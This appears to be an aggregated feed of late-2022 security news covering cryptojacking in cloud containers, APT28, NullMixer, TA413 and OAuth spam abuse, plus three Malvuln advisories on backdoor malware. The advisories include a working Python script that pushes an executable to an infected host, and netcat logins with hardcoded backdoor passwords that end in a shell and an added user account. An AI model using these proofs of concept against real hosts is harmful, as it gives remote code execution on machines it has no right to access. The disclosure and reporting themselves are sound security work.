Cloud-native threats are costing cloud customer victims money as cryptojackers mine their vulnerable cloud instances.

Threats against cloud-native infrastructure are on the rise, particularly as attackers target cloud and container resources to power their illicit cryptomining operations. In the latest twist, cybercriminals are wreaking havoc on cloud resources to both propagate and run cryptojacking enterprises in costly schemes that cost victims some $50 in cloud resources for every $1 worth of cryptocurrency that the crooks mine off of these compute reserves.

That's according to a new report out today from Sysdig, which shows that while the bad guys will indiscriminately attack any weak cloud or container resources they can get their hands on to power money-making cryptomining schemes, they're also cleverly strategic about it. 

In fact, many of the most crafty software supply chain attacks are in large part designed to spawn cryptominers via infected container images. Attackers not only leverage source code dependencies most commonly thought of in offensive supply chain attacks — they also leverage malicious container images as an effective attack vehicle, according to Sysdig's "2022 Cloud-Native Threat Report." 

Cybercriminals are taking advantage of the trend within the development community to share code and open source projects via premade container images via container registries like Docker Hub. Container images have all the required software installed and configured in an easy-to-deploy workload. While that's a serious time saver for developers, it also opens up a path for attackers to create images that have malicious payloads built in and then to seed platforms like DockerHub with their malicious wares. All it takes is for a developer to run a Docker pull request from the platform to get that malicious image running. What's more, the Docker Hub download and installation is opaque, making it even harder to spot the potential for trouble.

"It’s clear that container images have become a real attack vector, rather than a theoretical risk," the report explained, for which the Sysdig Threat Research Team (TRT) went through a monthslong process of sifting through public container images uploaded by users worldwide onto DockerHub to find malicious instances. "The methods employed by malicious actors described by Sysdig TRT are specifically targeted at cloud and container workloads."

The team's hunt surfaced more than 1,600 malicious images containing cryptominers, backdoors, and other nasty malware disguised as legitimate popular software. Cryptominers were far and away the most prevalent, making up 36% of the samples.

"Security teams can no longer delude themselves with the idea that 'containers are too new or too ephemeral for threat actors to bother,'" says Stefano Chierici, senior security researcher at Sysdig and co-author of the report. "Attackers are in the cloud, and they are taking real money. The high prevalence of cryptojacking activity is attributable to the low risk and high reward for the perpetrators."

**TeamTNT and Chimera**

As a part of the report, Chierici and his colleagues also did a deep-dive technical analysis of the tactics, techniques, and procedures (TTPs) of the TeamTNT threat group. Active since 2019, the group according to some sources has compromised over 10,000 cloud and container devices during one of its most prevalent attack campaigns, Chimera. It's best known for cryptojacking worm activity and according to the report, TeamTNT continues to refine its scripts and its TTPs in 2022. For example, it now connects scripts with the AWS Cloud Metadata service to leverage credentials associated with an EC2 instance and gain access to other resources tied to a compromised instance.

"If there are excessive permissions associated with these credentials, the attacker could gain even more access. Sysdig TRT believes that TeamTNT would want to leverage these credentials, if capable, to create more EC2 instances so it could increase its cryptomining capabilities and profits," the report said.

As part of its analysis, the team dug into a a number of XMR wallets used by TeamTNT during mining campaigns to figure out the financial impact of cryptojacking. 

Utilizing technical analysis of the threat group's operational practices during the Chimera operation, Sysdig was able to find that the adversary cost its victims $11,000 on a single AWS EC2 instance for every XMR it mined. The wallets the team recovered amounted some 40 XMR, meaning that the attackers drove up a cloud bill of nearly $430,000 to mine those coins. 

Using coin valuation from earlier this year, the report estimated the value of those coins equals about $8,100, with back-of-envelope figuring then showing that for every dollar the bad guys make, they cost victims at least $53 in cloud bills alone.

Container Supply Chain Attacks Cash In on Cryptojacking

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.
The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.

The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive."

The dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications for retrieving additional payloads.

The attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development (OECD), a Paris-based intergovernmental entity.

Cluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.

Potential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.

This is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix disclosed a similar attack chain that exploited the MSHTML remote code execution vulnerability (CVE-2021-40444) to drop the backdoor.

The development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using PowerPoint Mouseover Trick to Infect System with Malware

By Waqas
According to the breach notification, 369 Elbit Systems employees got their information stolen by the attackers.
This is a post from HackRead.com Read the original post: US branch of Israeli defense contractor Elbit hit by data breach

Elbit Systems of America, which is the US branch of an Israeli defense contractor, Elbit, has confirmed that its network was targeted by cybercriminals in early June 2022. Resultantly, the personal data of its employees was stolen.

The Texas-based firm hasn’t shared many details on the data breach, but it did reveal that the attack disrupted its ‘cyber operations.’

**Incident Details**

According to the breach notification issued by the Maine attorney general’s office, the American arm of Elbit’s network has suffered a data breach. Around 369 Elbit Systems employees got their information stolen by the attackers.

As per the company, exposed data includes employee names, dates of birth, addresses, ethnicity, direct deposit information, and Social Security Numbers. The company’s spokesperson in America and any representative from its parent organization in Israel haven’t commented on the incident yet.

**Who is the Attacker?**

As per Elbit Systems of America, the investigation is still going on. At the moment, it is difficult to attribute this attack to a specific hacker, cybercrime gang, or nation-state. The company is also unsure about the objective behind this attack.  

1.  Iran-linked hackers hit Israeli, US, and EU defense tech firm
2.  Dark web hacker leaks sensitive Indian defense contractor data
3.  Meet SockDetour fileless backdoor targeting U.S. Defense contractors
4.  Hackers Posing as Women to Con Israeli Officials into Installing Malware
5.  Unknown TA2541 group attacking aviation and defense sectors since 2017

**About Elbit**

For your information, Elbit Systems is an electronics and defense tech firm. It mainly builds unmanned aerial drones, intelligence gathering, espionage, and surveillance-related systems for governments and militaries, electronic warfare systems, and similar equipment and sells it worldwide.

The company also creates surveillance software. It acquired Nice Systems’ cyber and intelligence unit in 2015 for a whopping $160 million and renamed it Cyberbit. 

As noted by TechCrunch, internet watchdog Citizen Lab’s research found that Cyberbit’s commercial spyware was used for espionage activities against Ethiopian dissidents in the USA and the UK.

This spyware could steal users’ private data from the targeted device, including passwords, screenshots, and emails. However, it is also suspected that the Ethiopian government itself ordered the spying activity.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

US branch of Israeli defense contractor Elbit hit by data breach

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems.
"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called **NullMixer** on compromised systems.

"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware, and many others."

Besides siphoning users' credentials, address, credit card data, cryptocurrencies, and even Facebook and Amazon account session cookies, what makes NullMixer insidious is its ability to download dozens of trojans at once, significantly widening the scale of the infections.

Attack chains typically start when a user attempts to download cracked software from one of the sites, which leads to a password-protected archive that contains an executable file that, for its part, drops and launches a second setup binary designed to deliver an array of malicious files.

These malicious websites leverage search engine optimization (SEO) poisoning techniques such as keyword stuffing to feature them highly in search engine results. Similar tactics have been adopted by actors behind GootLoader and SolarMarker campaigns.

NullMixer, last month, was linked to the distribution of a rogue Google Chrome extension called FB Stealer, which is capable of Facebook credential theft and search engine substitution.

Some of the other prominent malware families distributed by the dropper include DanaBot and a raft of information-stealing malware such as ColdStealer, PseudoManuscrypt, Raccoon Stealer, Redline Stealer, and Vidar.

Also deployed using NullMixer are trojan downloaders like FormatLoader, GCleaner, LegionLoader (aka Satacom), LgoogLoader, PrivateLoader, SgnitLoader, ShortLoader, and SmokeLoader, as well as the C-Joker cryptocurrency wallet stealer.

Kaspersky said it blocked attempts to infect more than 47,778 victims worldwide, with a majority of the users located in Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey, and the U.S. The threat actor operating NullMixer has not been attributed to a known group.

The latest findings are yet another indication that malware and unwanted applications are being increasingly propagated via pirated software. It's also recommended to check online accounts regularly for unknown transactions.

"Any download of files from untrustworthy resources is a real game of roulette: you never know when it will fire, and which threat you will get this time," Kaspersky researcher Haim Zigel said. "Receiving NullMixer, users get several threats at once."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New NullMixer Malware Campaign Stealing Users' Payment Data and Credentials

Backdoor.Win32.Augudor.b malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/94ccd337cbdd4efbbcc0a6c888abb87d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Augudor.bVulnerability: Remote File Write Code Execution Description: The malware drops an empty file named "zy.exe" and listens on TCP port 810. Third-party adversaries who can reach the infected host can write executable code to the empty "zy.exe" file on the system via a socket program and it will execute as soon as the binary transfer has completed. Successfully tested with a 880 byte executable.Family: AugudorType: PE32MD5: 94ccd337cbdd4efbbcc0a6c888abb87d Vuln ID: MVID-2022-0644Dropped files: zy.exeDisclosure: 09/25/2022Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=810DOOM="DOOM_SM.exe" #880 bytesdef doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Augudor.b MVID-2022-0644 Code Execution

Backdoor.Win32.Psychward.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/0b8cf90ab9820cb3fcb7f1d1b45e4e57.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Psychward.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 8888 and requires authentication. However, the password "4174" is weak and hardcoded in cleartext within the PE file.Family: PsychwardType: PE32MD5: 0b8cf90ab9820cb3fcb7f1d1b45e4e57Vuln ID: MVID-2022-0645Disclosure: 09/25/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 8888connected 09/12/22 20:44:12. version 0.2.1pwd 4174password accepteddir..12520437.cpx       2,15112520850.cpx       2,233@AudioToastIcon.png  308@EnrollmentToastIcon.png  330@VpnToastIcon.png   404@WirelessDisplayToast.png  691aadauthhelper.dll  154,624aadtb.dll     954,880AboveLockAppHost.dll  252,928Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Psychward.b MVID-2022-0645 Hardcoded Credential

Backdoor.Win32.Bingle.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Bingle.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: BingleType: PE32MD5: eacaa12336f50f1c395663fba92a4d32Vuln ID: MVID-2022-0643 Disclosure: 09/24/2022004029A0                 call    sub_4010E0004029A5                 add     esp, 0Ch004029A8                 cmp     eax, ebp004029AA                 jge     short loc_4029CC004029AC                 mov     edi, [esp+eax*4+230h+var_21C]004029B0                 mov     ecx, ebx004029B2                 xor     eax, eax004029B4                 repne scasb004029B6                 not     ecx004029B8                 sub     edi, ecx004029BA                 mov     edx, ecx004029BC                 mov     esi, edi004029BE                 mov     edi, offset aLetMeIn ; "let me in"Exploit/PoC:C:\>nc64.exe x.x.x.x 22let me in Nt Shell 1.0 beta by bingle@email.com.cn        Indicator '#' is NTShell Server output.        Type ?help for support commands beyond cmd;        ?use at command line for support parameters.        Use 'net helpmsg xxx' to see detail message of Error Code.Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user hyp3rlinx 1313 /addnet user hyp3rlinx 1313 /addThe command completed successfully.C:\Users\Victim\Desktop>?help#?autorun [name file "args"] --- add the [file] to autorun when reboot,                 [file] default is ntshell.exe#?canceldata            --- abort the previous file transfer command#?chdir <dir>           --- change the server current dir to <dir>,                 can be UNC(share) name#?get <file> [port]     --- GET <file> from server, server use [port] to tranfer#?help                  --- show this HELP#?httpget <url> <file>  --- get the 'file' from 'url',                eg:httpget http://192.168.0.1 /hackdir/hackprog.exe#?pskill PID            --- Kill the Process with PID#?pslist                --- List the all process in system#?put <file> [port]     --- PUT <file> to server, server use [port] to tranfer#?quit                  --- QUIT the telnetd program#?restart [<user> [pass]]       --- restart the shell as [user] in stead of                IUSR_computer if [user] specified, no need to reconnect#?sysinfor              --- Get the System os informationDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Bingle.b MVID-2022-0643 Hardcoded Credential

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.
Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.

"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis.

TA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed FriarFox.

The group's exploitation of the Follina flaw was previously highlighted by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.

Also put to use in a spear-phishing attack identified in May 2022 is a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

In another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.

LOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.

"The group continues to incorporate new capabilities while also relying on tried-and-tested \[tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of wider trends with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

By Deeba Ahmed
According to Microsoft 365 Defender Research Team, in an incident they analyzed, malicious OAuth applications were deployed on compromised cloud tenants, and eventually, attackers took over Exchange servers to carry out spam campaigns. 
This is a post from HackRead.com Read the original post: New Spam Attack Abusing OAuth Apps to Target Microsoft Exchange Servers

According to a new disclosure notice from the Microsoft 365 Defender Research Team, cybercriminals are increasingly targeting Microsoft Exchange servers. Their modus operandi involves abusing OAuth applications. 

**Spam Campaigns Involving Malicious OAuth Apps Detected**

Although this isn’t the first time that threat actors have targeted Exchange Server, this campaign is unique because of abusing OAuth applications. These applications are an integral part of the attack chain in this instance.

Per MS 365 Defender Research, in an incident they analyzed, malicious OAuth applications were deployed on compromised cloud tenants, and eventually, attackers took over Exchange servers to carry out spam campaigns.

Researchers explained that the threat actor(s) launched a credential-stuffing attack, targeting high-risk accounts where users didn’t enable multifactor authentication. The attacker then leveraged unsecured admin accounts and could gain initial access.

Afterward, the attacker created a malicious OAuth application, adding an inbound connector to the Exchange email server. Hence, the actor can send out spam emails using the target domain.

Previously, OAuth applications were abused in consent phishing attacks where attackers try to access cloud services by tricking users into allowing permission to malicious OAuth apps. Some state-sponsored actors have also abused them for C2 communications, redirections, phishing attacks, and deployment of backdoors.

**Campaign Targets Overview**

Researchers disclosed in their report that numerous organizations have been targeted in credential stuffing attacks so far. In this campaign, attackers launch attacks against administrator account that lack MFA and use them to access the victim’s cloud tenant.

This campaign mainly targets consumers and enterprise tenants, abusing weaknesses in the organization’s security mechanisms and may even lead to ransomware and other devastating attacks.

In this attack, according to Microsoft 365 Defender Research Team report, attackers run spam email campaigns, advertise for fake sweepstakes through spoofing organizations’ identities, or offer an iPhone as a prize to trick victims into signing up for long-term paid subscriptions.

The campaign uses a network of single-tenant apps installed on the compromised organization. This helps the attacker gain an identity platform to launch the attack. As soon as the campaign was disclosed, all the malicious OAuth apps were removed. Organizations must implement stringent security practices to prevent such scams. Enabling MFA should be the first line of defense against such threats.

1.  Hackers hit Microsoft Exchange Server to steal email data
2.  European Banking Authority victim in Microsoft Exchange Server hack
3.  Hackers Using Malicious IIS Extensions to Backdoor Exchange Servers
4.  It’s Google.com, not ɢoogle.com; beware of the pro-Trump spam domain
5.  Spam Campaigns Using Trickbot Banking Trojan Against Cryptocurrencies

New Spam Attack Abusing OAuth Apps to Target Microsoft Exchange Servers

Cybercriminals took control of enterprise Exchange Servers to spread large amounts of spam aimed at signing people up for bogus subscriptions.

Attackers are deploying malicious OAuth applications on compromised cloud tenants, with the goal of taking over Microsoft Exchange Servers to spread spam.  

That's according to the Microsoft 365 Defender Research Team, which detailed this week how credential-stuffing attacks have been launched against high-risk accounts that don’t have multifactor authentication (MFA) enabled, then leveraging unsecured administrator accounts to gain initial access.

The attackers were subsequently able to create a malicious OAuth app, which added a malicious inbound connector in the email server.

**Modified Server Access**

"These modifications to the Exchange server settings allowed the threat actor to perform their primary goal in the attack: sending out spam emails," the researchers noted in a blog post on Sept. 22. "The spam emails were sent as part of a deceptive sweepstakes scheme meant to trick recipients into signing up for recurring paid subscriptions."

The research team concluded that the hacker's motive was to spread misleading spam messages about sweepstakes, inducing victims to hand over credit card information to enable a recurring subscription that would offer them "the chance to win a prize."

"While the scheme likely resulted in unwanted charges to targets, there was no evidence of overt security threats such as credential phishing or malware distribution," the research team noted.

The post also pointed out that a growing population of malicious actors have been deploying OAuth applications for various campaigns, from backdoors and phishing attacks to command-and-control (C2) communication and redirections.

Microsoft recommended implementing security practices like MFA that strengthen account credentials, as well as conditional access policies and continuous access evaluation (CAE).

"While the follow-on spam campaign targets consumer email accounts, this attack targets enterprise tenants to use as infrastructure for this campaign," the research team added. "This attack thus exposes security weaknesses that could be used by other threat actors in attacks that could directly impact affected enterprises."

**MFA Can Help, but Additional Access Control Policies Required**

“While MFA is a great start and could have helped Microsoft in this case, we have seen in the news recently that not all MFA is the same," notes David Lindner, CISO at Contrast Security. "As a security organization, it is time we start from 'the username and password is compromised' and build controls around that."

Lindner says the security community needs to start with some basics and follow the principle of least privilege to create appropriate, business-driven, role-based access control policies.

"We need to set appropriate technical controls like MFA — FIDO2 as your best option — device-based authentication, session timeouts, and so on," he adds.

Lastly, organizations need to monitor for anomalies such as "impossible logins" (i.e., login attempts to the same account from, say, Boston and Dallas, that are 20 minutes apart); brute-force attempts; and user attempts to access unauthorized systems.

"We can do it, and we can greatly increase the security posture of an organization overnight by tightening our authentication mechanisms,” Lindner says.

Tag

#backdoor